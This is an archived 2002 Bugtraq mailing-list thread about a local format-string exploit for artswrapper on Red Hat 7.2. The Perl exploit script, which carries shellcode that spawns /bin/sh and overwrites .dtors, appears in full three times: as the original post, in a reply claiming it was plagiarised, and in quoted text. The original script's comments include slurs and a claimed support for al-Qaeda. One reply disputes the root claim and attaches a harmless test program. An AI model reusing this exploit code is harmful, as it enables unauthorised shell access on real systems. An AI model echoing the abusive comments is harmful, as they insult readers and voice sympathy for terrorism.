8699348 2002-07-06 15:45 -0000 /13 rader/ kanix THE HACKER <kanix@twinkie.com> Sänt av: joel@lysator.liu.se Importerad: 2002-07-07 23:44 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Extern mottagare: vulnwatch@vulnwatch.org Extern mottagare: vuln-dev@securityfocus.com Extern mottagare: submissions@packetstormsecurity.org Mottagare: Bugtraq (import) <22973> Ärende: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT ------------------------------------------------------------ From: "kanix THE HACKER" <kanix@twinkie.com> To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org, vuln-dev@securityfocus.com, submissions@packetstormsecurity.org Message-ID: <20020706194517.27759.qmail@inbox.net> Greetings, This is a local exploit for a format string vulnerability in /usr/bin/artswrapper on Red Hat Linux release 7.2 (Enigma). Sincerely, kanix (8699348) /kanix THE HACKER <kanix@twinkie.com>/(Ombruten) Bilaga (text/x-perl) i text 8699349 Kommentar i text 8702710 av Olaf Kirch <okir@suse.de> Kommentar i text 8703241 av KF <dotslash@snosoft.com> 8699349 2002-07-06 15:45 -0000 /116 rader/ kanix THE HACKER <kanix@twinkie.com> Bilagans filnamn: "fartsy.pl" Importerad: 2002-07-07 23:44 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Extern mottagare: vulnwatch@vulnwatch.org Extern mottagare: vuln-dev@securityfocus.com Extern mottagare: submissions@packetstormsecurity.org Mottagare: Bugtraq (import) <22974> Bilaga (text/plain) till text 8699348 Ärende: Bilaga (fartsy.pl) till: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT ------------------------------------------------------------ #!/usr/bin/perl ######################################################################## # # fartsy.pl by kanix <kanix@0xfee1dead.net> # /usr/sbin/artswrapper <local format string exploit> # Tested on Red Hat Linux release 7.2 (Enigma) # # Jul 6, 2002 # # "the secret to creativity is knowing how to hide your sources." # - Albert Einstein # # commentz, job offerz, flamez, etc. should be directed to my e-mail # address -- I WILL SCHOOL YOU ALL. # # SCREW THE USA! FEAR THE POWER OF .NO !@#$%! # official supporter of the al-Qaeda Terrorist Network. # # BURN, BABY, BURN!!! # # I 0xc0ded this for fun and profit... and to get scene whorez. ;> # # This code is far from special - my mother could have written it, # however, that is the extent of my ability. # # I can code sploits, but I know nothing of UNC file sharing! I'm # still very 0x1337. I mean, I can code exploits, that's what makes # you a hacker! # # SPECIAL NOTE TO SCRIPT KIDDIEZ: go get a playstation or something, # there are enuff retardz in the hacker scene already (LIKE ME ;>)! # # Greetz: #!digit-labs, #0xfee1dead, #rootless, #!GOBBLES, synnergy, # security.is, #hackphreak, teleh0r (fame seeking whore like # me!), worldsex.com, badpack3t (no 0day for j00!), TEAM TESO # AND ALL OTHER FANZ OF THE DMCA (COPYRIGHT THIS, BITCH!@#$%!) # # kanix: I know how the stack werkz... I AM A HACKER. OK??!?!!! # # kanix: can some1 pleeze tell me about DNS cache poisoning? # ######################################################################## $kode = "\x31\xdb". # xor ebx, ebx "\xf7\xe3". # mul ebx "\xb0\x17". # mov al, 0x17 "\xcd\x80". # int 0x80 "\x31\xc0". # xor eax, eax "\x99". # cdq "\x52". # push edx "\x68\x2f\x2f\x73\x68". # push dword 0x68732f2f "\x68\x2f\x62\x69\x6e". # push dword 0x6e69622f "\x89\xe3". # mov ebx, esp "\x52". # push edx "\x53". # push ebx "\x89\xe1". # mov ecx, esp "\xb0\x0b". # mov al, 0x0b "\xcd\x80"; # int 0x80 $vuln = "/usr/bin/artswrapper"; $dtors = 0x8049a7c + 4;; # I overwrite .dtors! (patent pending) printf("\n-- /usr/bin/artswrapper local format string exploit\n"); printf("\t by kanix <kanix\@0xfee1dead.net>\n\n"); $ret_addr = 0xc0000000 - 4 - (length($vuln) + 1) - (length($kode) + 1) ; undef(%ENV); $ENV{'1337'} = $kode; printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr); printf("bruteforcing distance (1 .. 300)\n"); sleep(2); for (1 .. 300) { $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_); die("\x0a") if (system("$vuln -a $fmt_str")) =~ m/^(0|256|512|32512)$/; } sub sw_fmtstr_create ($$$) { die("Incorrect number of arguments for sw_fmtstr_create") unless @_ == 3; my ($dest_addr, $ret_addr, $dist) = @_; my ($word, $qword) = (2, 8); $tmp1 = (($ret_addr >> 16) & 0xffff); $tmp2 = $ret_addr & 0xffff; if ($tmp1 < $tmp2) { $high = $tmp1 - $qword; $low = $tmp2 - $high - $qword; $dest_addr1 = pack('L', $dest_addr + $word); $dest_addr2 = pack('L', $dest_addr); } else { $high = $tmp2 - $qword; $low = $tmp1 - $high - $qword; $dest_addr1 = pack('L', $dest_addr); $dest_addr2 = pack('L', $dest_addr + $word); } sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn", $dest_addr1, $dest_addr2, $high, $dist, $low, $dist + 1); } (8699349) /kanix THE HACKER <kanix@twinkie.com>/---- 8702710 2002-07-08 13:03 +0200 /55 rader/ Olaf Kirch <okir@suse.de> Sänt av: joel@lysator.liu.se Importerad: 2002-07-08 18:38 av Brevbäraren Extern mottagare: kanix THE HACKER <kanix@twinkie.com> Extern kopiemottagare: bugtraq@securityfocus.com Extern kopiemottagare: vulnwatch@vulnwatch.org Extern kopiemottagare: vuln-dev@securityfocus.com Extern kopiemottagare: submissions@packetstormsecurity.org Mottagare: Bugtraq (import) <22980> Kommentar till text 8699348 av kanix THE HACKER <kanix@twinkie.com> Ärende: Re: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT ------------------------------------------------------------ From: Olaf Kirch <okir@suse.de> To: kanix THE HACKER <kanix@twinkie.com> Cc: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org, vuln-dev@securityfocus.com, submissions@packetstormsecurity.org Message-ID: <20020708130304.G15149@wotan.suse.de> Disclaimer - I investigated this issue on SuSE, not RedHat, so the situation there may be somewhat different. On Sun, Jul 07, 2002 at 09:43:06PM +0000, kanix THE HACKER wrote: > This is a local exploit for a format string vulnerability in > /usr/bin/artswrapper on Red Hat Linux release 7.2 (Enigma). Hm. I am not quite sure why this exploit should give you a root shell (unless RedHat made artsd setuid root, too). artswrapper does a seteuid(getuid()) which sets the effective uid back to that of the caller. Then it calls execv(/opt/.../artsd). The execv call takes care of the saved uid. So what you get is a shell running with realtime scheduling priority, but no root privilege. For what it's worth, there are simpler methods to obtain a process with RT-privilege using artsd. Compile the attached program as /tmp/lalla and check: $ artswrapper -m /tmp/lalla -a foo >> running as realtime process now (priority 50) Current scheduling policy is FIFO Which is disturbing, but a far cry from root privileges as claimed in the original posting. Apart from that, artsd has a load of other ways to break it. Unchecked vsprintf calls in arts/mcop/debug.cc for instance. But given that artsd is linked against 16 shared libraries I'm sure there are at least that many different ways to exploit it. Fortunately, KDE seems to have picked up the habit of protecting the directory in which the mcop communication socket resides so that no-one except the user running artsd can connect. If I am not mistaken, the original intention of giving artsd real- time scheduling policy was to make sure that sound data was being fed to the sound device with a low latency; which is important for many sound cards which have ridiculously small buffers. It seems though that artsd has mutated into something much bigger in the meantime; maybe it's time to consider whether one shouldn't split off the part feeding the audio device... Olaf -- Olaf Kirch | Anyone who has had to work with X.509 has probably okir@suse.de | experienced what can best be described as ---------------+ ISO water torture. -- Peter Gutmann (8702710) /Olaf Kirch <okir@suse.de>/-----(Ombruten) Bilaga (text/plain) i text 8702711 8702711 2002-07-08 13:03 +0200 /18 rader/ Olaf Kirch <okir@suse.de> Importerad: 2002-07-08 18:38 av Brevbäraren Extern mottagare: kanix THE HACKER <kanix@twinkie.com> Extern kopiemottagare: bugtraq@securityfocus.com Extern kopiemottagare: vulnwatch@vulnwatch.org Extern kopiemottagare: vuln-dev@securityfocus.com Extern kopiemottagare: submissions@packetstormsecurity.org Mottagare: Bugtraq (import) <22981> Bilaga (text/plain) till text 8702710 Ärende: Bilaga till: Re: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT ------------------------------------------------------------ #include <stdio.h> #include <sched.h> int main() { int sched = sched_getscheduler(0); const char *name = "unknown"; switch (sched) { case SCHED_FIFO: name = "FIFO"; break; case SCHED_RR: name = "RR"; break; case SCHED_OTHER: name = "OTHER"; break; } printf("Current scheduling policy is %s\n", name); return 0; } (8702711) /Olaf Kirch <okir@suse.de>/--------------- 8703241 2002-06-12 22:24 -0700 /264 rader/ KF <dotslash@snosoft.com> Sänt av: joel@lysator.liu.se Importerad: 2002-07-08 20:36 av Brevbäraren Extern mottagare: kanix THE HACKER <kanix@twinkie.com> Extern kopiemottagare: bugtraq@securityfocus.com Extern kopiemottagare: vuln-dev@securityfocus.com Extern kopiemottagare: vulnwatch@vulnwatch.org Extern kopiemottagare: submissions@packetstormsecurity.org Mottagare: Bugtraq (import) <22983> Kommentar till text 8699348 av kanix THE HACKER <kanix@twinkie.com> Ärende: Re: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT ------------------------------------------------------------ From: "KF" <dotslash@snosoft.com> To: "kanix THE HACKER" <kanix@twinkie.com> Cc: <bugtraq@securityfocus.com>, <vuln-dev@securityfocus.com>, <vulnwatch@vulnwatch.org>, <submissions@packetstormsecurity.org> Message-ID: <000201c212ef$5f9e2a80$0201000a@k7ezizjvt9gjdv> Heh looks like I fell asleep on releasing this one... and it looks like the posted code was actually code from our labs (credit where its due please)...just so you are aware the issue is really in artsd which is NOT suid ... you should get a shell with your own privs... Heres where that code really came from.... [root@ghetto dotslash]# artswrapper -a %x >> running as realtime process now (priority 50) Error while initializing the sound driver: unable to select 'bffffa40' style audio I/O [root@ghetto dotslash]# ls -al `which artswrapper` -rwsr-sr-x 1 root root 4136 Sep 8 2001 /usr/bin/artswrapper [root@ghetto dotslash]# ls -al `which artsd` -rwxr-xr-x 1 root root 115284 Sep 8 2001 /usr/bin/artsd [root@ghetto dotslash]# artsd -a %x Error while initializing the sound driver: unable to select 'bffffa80' style audio I/O [dotslash@ghetto dotslash]$ cat /etc/hackme/done/artswrapex.pl #!/usr/bin/perl ## ---/ artswrapex.pl /------------------------------------------------ ## ## /usr/bin/artswrapper local format string exploit ## * tested on Red Hat Linux release 7.2 (Enigma) ## * Jun 17 2002 ## ## Author: stringz // thc@drug.org ## ## Developed on the Snosoft Cerebrum test bed. - http://www.snosoft.com ## ## Greets: g463, syphix, S (super), KF, vacuum, dageshi, sozni, ## obscure, jove, rachel, kevin, and all of my 2e2h friends. ## ## ---/ powered by pot /----------------------------------------------- # setuid + execve shellcode $kode = "\x31\xdb". # xor ebx, ebx "\xf7\xe3". # mul ebx "\xb0\x17". # mov al, 0x17 "\xcd\x80". # int 0x80 "\x31\xc0". # xor eax, eax "\x99". # cdq "\x52". # push edx "\x68\x2f\x2f\x73\x68". # push dword 0x68732f2f "\x68\x2f\x62\x69\x6e". # push dword 0x6e69622f "\x89\xe3". # mov ebx, esp "\x52". # push edx "\x53". # push ebx "\x89\xe1". # mov ecx, esp "\xb0\x0b". # mov al, 0x0b "\xcd\x80"; # int 0x80 $vuln = "/usr/bin/artswrapper"; $dtors = 0x8049a7c + 4;; printf("\n-- /usr/bin/artswrapper local format string exploit\n"); printf("-- stringz // thc\@drug.org\n\n"); $ret_addr = 0xc0000000 - 4 - (length($vuln) + 1) - (length($kode) + 1) ; undef(%ENV); $ENV{'1337'} = $kode; printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr); printf("bruteforcing distance (1 .. 300)\n"); sleep(2); for (1 .. 300) { $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_); die("\x0a") if (system("$vuln -a $fmt_str")) =~ m/^(0|256|512|32512)$/; # may need a tweak ;) } sub sw_fmtstr_create ($$$) { die("Incorrect number of arguments for sw_fmtstr_create") unless @_ == 3; my ($dest_addr, $ret_addr, $dist) = @_; my ($word, $qword) = (2, 8); # $dest_addr = where to write $ret_addr # $ret_addr = where to return execution # $dist = the calculated distance $tmp1 = (($ret_addr >> 16) & 0xffff); $tmp2 = $ret_addr & 0xffff; if ($tmp1 < $tmp2) { $high = $tmp1 - $qword; $low = $tmp2 - $high - $qword; $dest_addr1 = pack('L', $dest_addr + $word); $dest_addr2 = pack('L', $dest_addr); } else { $high = $tmp2 - $qword; $low = $tmp1 - $high - $qword; $dest_addr1 = pack('L', $dest_addr); $dest_addr2 = pack('L', $dest_addr + $word); } sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn", $dest_addr1, $dest_addr2, $high, $dist, $low, $dist + 1); } -KF ----- Original Message ----- From: "kanix THE HACKER" <kanix@twinkie.com> To: <bugtraq@securityfocus.com>; <vulnwatch@vulnwatch.org>; <vuln-dev@securityfocus.com>; <submissions@packetstormsecurity.org> Sent: Saturday, July 06, 2002 3:45 PM Subject: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT > Greetings, > > This is a local exploit for a format string vulnerability in /usr/bin/artswrapper on Red Hat Linux release 7.2 (Enigma). > > Sincerely, > > kanix > ---------------------------------------------------------------------------- ---- > #!/usr/bin/perl > > ######################################################################## > # > # fartsy.pl by kanix <kanix@0xfee1dead.net> > # /usr/sbin/artswrapper <local format string exploit> > # Tested on Red Hat Linux release 7.2 (Enigma) > # > # Jul 6, 2002 > # > # "the secret to creativity is knowing how to hide your sources." > # - Albert Einstein > # > # commentz, job offerz, flamez, etc. should be directed to my e-mail > # address -- I WILL SCHOOL YOU ALL. > # > # SCREW THE USA! FEAR THE POWER OF .NO !@#$%! > # official supporter of the al-Qaeda Terrorist Network. > # > # BURN, BABY, BURN!!! > # > # I 0xc0ded this for fun and profit... and to get scene whorez. ;> > # > # This code is far from special - my mother could have written it, > # however, that is the extent of my ability. > # > # I can code sploits, but I know nothing of UNC file sharing! I'm > # still very 0x1337. I mean, I can code exploits, that's what makes > # you a hacker! > # > # SPECIAL NOTE TO SCRIPT KIDDIEZ: go get a playstation or something, > # there are enuff retardz in the hacker scene already (LIKE ME ;>)! > # > # Greetz: #!digit-labs, #0xfee1dead, #rootless, #!GOBBLES, synnergy, > # security.is, #hackphreak, teleh0r (fame seeking whore like > # me!), worldsex.com, badpack3t (no 0day for j00!), TEAM TESO > # AND ALL OTHER FANZ OF THE DMCA (COPYRIGHT THIS, BITCH!@#$%!) > # > # kanix: I know how the stack werkz... I AM A HACKER. OK??!?!!! > # > # kanix: can some1 pleeze tell me about DNS cache poisoning? > # > ######################################################################## > > $kode = > "\x31\xdb". # xor ebx, ebx > "\xf7\xe3". # mul ebx > "\xb0\x17". # mov al, 0x17 > "\xcd\x80". # int 0x80 > "\x31\xc0". # xor eax, eax > "\x99". # cdq > "\x52". # push edx > "\x68\x2f\x2f\x73\x68". # push dword 0x68732f2f > "\x68\x2f\x62\x69\x6e". # push dword 0x6e69622f > "\x89\xe3". # mov ebx, esp > "\x52". # push edx > "\x53". # push ebx > "\x89\xe1". # mov ecx, esp > "\xb0\x0b". # mov al, 0x0b > "\xcd\x80"; # int 0x80 > > $vuln = "/usr/bin/artswrapper"; > $dtors = 0x8049a7c + 4;; # I overwrite .dtors! (patent pending) > > printf("\n-- /usr/bin/artswrapper local format string exploit\n"); > printf("\t by kanix <kanix\@0xfee1dead.net>\n\n"); > > $ret_addr = 0xc0000000 - 4 > - (length($vuln) + 1) > - (length($kode) + 1) > ; > > undef(%ENV); $ENV{'1337'} = $kode; > > printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr); > printf("bruteforcing distance (1 .. 300)\n"); > sleep(2); > > for (1 .. 300) { > $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_); > die("\x0a") if (system("$vuln -a $fmt_str")) > =~ m/^(0|256|512|32512)$/; > } > > sub > sw_fmtstr_create ($$$) > { > die("Incorrect number of arguments for sw_fmtstr_create") > unless @_ == 3; > > my ($dest_addr, $ret_addr, $dist) = @_; > my ($word, $qword) = (2, 8); > > $tmp1 = (($ret_addr >> 16) & 0xffff); > $tmp2 = $ret_addr & 0xffff; > > if ($tmp1 < $tmp2) { > $high = $tmp1 - $qword; > $low = $tmp2 - $high - $qword; > > $dest_addr1 = pack('L', $dest_addr + $word); > $dest_addr2 = pack('L', $dest_addr); > } > else { > $high = $tmp2 - $qword; > $low = $tmp1 - $high - $qword; > > $dest_addr1 = pack('L', $dest_addr); > $dest_addr2 = pack('L', $dest_addr + $word); > } > > sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn", > $dest_addr1, $dest_addr2, $high, $dist, > $low, $dist + 1); > } > (8703241) /KF <dotslash@snosoft.com>/-----(Ombruten)